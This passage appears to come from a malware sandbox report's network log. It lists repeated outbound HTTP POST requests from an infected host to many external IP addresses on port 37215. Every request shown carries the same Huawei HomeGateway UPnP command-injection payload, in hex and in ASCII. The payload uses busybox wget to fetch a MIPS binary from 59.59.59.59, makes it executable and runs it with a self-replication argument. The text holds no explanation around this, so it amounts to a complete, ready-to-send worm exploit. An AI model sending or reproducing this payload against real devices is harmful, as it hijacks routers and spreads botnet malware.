20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1163192.168.2.1553078169.240.27.24237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.725686073 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1164192.168.2.155754441.174.182.6237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.730030060 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1165192.168.2.155723641.159.187.14237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.730082035 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1166192.168.2.155580041.88.180.19237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.730592966 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1167192.168.2.1533376197.21.49.6337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.730664968 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1168192.168.2.1544548157.66.234.24737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.730686903 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1169192.168.2.1546026197.3.29.17237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.730725050 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1170192.168.2.1550460219.204.72.1737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.730763912 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1171192.168.2.154125241.130.106.24037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.730866909 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1172192.168.2.1555200157.61.136.2237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.730897903 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1173192.168.2.1558738197.197.134.8237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.730951071 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
